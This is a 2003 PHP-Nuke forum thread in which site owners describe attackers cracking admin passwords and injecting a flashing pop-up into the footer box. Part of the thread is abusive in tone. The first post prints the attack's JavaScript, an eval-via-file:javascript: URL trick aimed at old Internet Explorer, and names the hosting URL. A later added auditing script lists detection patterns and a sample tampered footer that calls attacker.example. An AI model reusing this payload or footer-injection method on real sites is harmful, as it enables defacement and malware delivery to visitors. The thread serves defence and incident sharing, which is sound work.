Ok there are some little hackin fags out there messin with Nuke sites. One in particular is crackin admin passwords and adding this link to the footer box in the admin preferences section.
This in turn causes an HTML page to open on the main page of your site and continually flash. Encoded in this HTML page are a series of scripts, listed below.
function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    for (i=0;i<lines.length;i++) {
        line = lines[i];
        line = line.replace(/^\s+/,"");
        line = line.replace(/\s+$/,"");
        line = line.replace(/'/g,"\\'");
        line = line.replace(/[\\]/g,"\\\\");
        line = line.replace(/[/]/g,"%2f");
        if (line != '') {
            result += line +'\\r\\n';
        }
    }
    return result;
}
function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:javascript:eval('" + mycode + "')";
    window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 50000);
You are then taken to "http://don.niggie.net/bla2.html"
function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    for (i=0;i<lines.length;i++) {
        line = lines[i];
        line = line.replace(/^\s+/,"");
        line = line.replace(/\s+$/,"");
        line = line.replace(/'/g,"\\'");
        line = line.replace(/[\\]/g,"\\\\");
        line = line.replace(/[/]/g,"%2f");
        if (line != '') {
            result += line +'\\r\\n';
        }
    }
    return result;
}
function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:javascript:eval('" + mycode + "')";
    window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 5000);
What these scripts do is upload 2 files, one called ddos.exe and the other called hide.exe, that auto-execute if you do not have a firewall up. These files shut down all access to your email accounts and also prevent you from opening any windows. When you try to open a cascading screen it immediately disappears so you can't use it. Once they find your password they then add a script like this to your footer box in your admin preferences.
My advice: choose an admin username that is totally different from your regular username. That makes it harder for them to find, since the cracker probably searches for matches to the registered usernames that show up in your members list.
Number one, though: immediately change all the passwords for all your users who have admin access, because if you haven't done it yet, he can still get into your site.
THESE SITES ARE STILL UP AND RUNNING SO BEWARE... IT HAS BEEN REPORTED TO THE SERVICE PROVIDER THAT THIS INDIVIDUAL IS USING, BUT NOTHING HAS BEEN DONE.
Where do I get the patch, guys, for this security hack? My PC will be safe, won't it? I went to that site at "www.don.niggie.net/bla.html" but I have a firewall and nothing happened. I had no popups or nothing, and I searched for hide.exe and ddos.exe and it found nothing?
cheers
The person who made that hack wants burning at the stake.
_________________
Backup files BEFORE altering
Use PHPNuke 7.6 with patches!!
No private messages please, POST in forums.
DaveTomneyUK Lieutenant
Joined: Sep 03, 2003
Posts: 162
Location: UK, England
Posted:
Thu Oct 16, 2003 9:27 am
cheers
Minne Lieutenant
Joined: Jul 15, 2003
Posts: 150
Location: Small Sports
Posted:
Sun Oct 19, 2003 8:09 pm
but when u choose another user name for admin it's so easy to find b/c when u post news it says posted by: username
so it's not that tricky
_________________
arghhhh Nuke Soldier
Joined: Oct 24, 2003
Posts: 13
Posted:
Fri Oct 24, 2003 9:59 am
Idiots!
They did it to our website, the same don.niggie thing.
Also created an admin account called BOO
I wonder what the point of them doing this is.
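A defender-side check for the two signs of compromise reported in this thread, script added to the footer box and an admin account nobody created (BOO), written as an added example that is not from any poster or from PHP-Nuke. The rule names, host allowlist and sample strings are constructed; reading the footer text and admin list out of your own install is assumed to happen elsewhere.

```javascript
// Added example: audit stored footer HTML and the admin list after a suspected compromise.
// Rule ids, hosts and sample data are constructed for illustration.
const FOOTER_RULES = [
  { id: "script-tag",     re: /<\s*script\b/i },
  { id: "frame-or-embed", re: /<\s*(iframe|frame|object|embed)\b/i },
  { id: "script-url",     re: /\b(javascript|vbscript|file)\s*:/i },
  { id: "window-open",    re: /\bwindow\s*\.\s*open\s*\(/i },
  { id: "eval-or-timer",  re: /\b(eval|setTimeout|setInterval)\s*\(/i },
  { id: "event-handler",  re: /\son[a-z]+\s*=/i },
];

// Return the ids of every rule the footer matches, plus any URL host
// that is not on the site's own allowlist.
function auditFooter(html, allowedHosts = []) {
  const findings = FOOTER_RULES.filter(r => r.re.test(html)).map(r => r.id);
  const allowed = new Set(allowedHosts.map(h => h.toLowerCase()));
  const hostRe = /https?:\/\/([^\/"'\s>:]+)/gi;
  for (const m of html.matchAll(hostRe)) {
    const host = m[1].toLowerCase();
    if (!allowed.has(host)) findings.push(`unlisted-host:${host}`);
  }
  return findings;
}

// Admin accounts present now that are missing from the known-good list
// (compared case-insensitively).
function unexpectedAdmins(current, expected) {
  const known = new Set(expected.map(n => n.toLowerCase()));
  return current.filter(n => !known.has(n.toLowerCase()));
}

// Constructed sample data: a normal footer and the same footer with a script appended.
const cleanFooter = '<a href="http://www.example.org/">My Site</a> &copy; 2003';
const tamperedFooter = cleanFooter +
  '<script>window.open("http://attacker.example/page.html","_blank")</script>';

console.log(auditFooter(cleanFooter, ["www.example.org"]));
console.log(auditFooter(tamperedFooter, ["www.example.org"]));
console.log(unexpectedAdmins(["siteadmin", "BOO"], ["SiteAdmin"]));
```

Any finding on a footer that should hold only plain links is a reason to restore the footer from backup and rotate every admin password.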
aleco Nuke Cadet
Joined: May 29, 2003
Posts: 3
Posted:
Fri Oct 24, 2003 12:11 pm
We got hacked too, but fixed it before anything much was done (only 2 people noticed something was wrong).
Anyway, upon inspection of the server logs, this is his/her IP address:
julie.nfrance.com
I can provide further details of activity if required - it looks like this person started going through hundreds of our files, stopped for a short period (a week or two) and then came back again just before the final hack. (presumably this was the time required to crack the passwords stored in the database?)
Also, should I send an email to anyone about this? E.g. our hosts, the hacker's hosts, and Microsoft? I say Microsoft as it only appeared to affect IE, not Opera. Opera just opened a new window, leading to error.jsp. However I'm behind a firewall so didn't actually suffer from anything, so perhaps it was just me.
Anyway, any further info/help let me know!
Zhen-Xjell Nuke Cops Founder
Joined: Nov 14, 2002
Posts: 5939
Posted:
Sat Oct 25, 2003 12:17 pm
Yes, anything you can get from your logs to submit to their abuse agencies you should do immediately.
_________________ Paul Laudanski, Microsoft MVP Windows-Security
saupz Nuke Cadet
Joined: Oct 27, 2003
Posts: 1
Posted:
Mon Oct 27, 2003 1:20 am
sometimes hacker is good enough looking at our weakness.. but sometime they are good trying to help us in looking for the bug and hole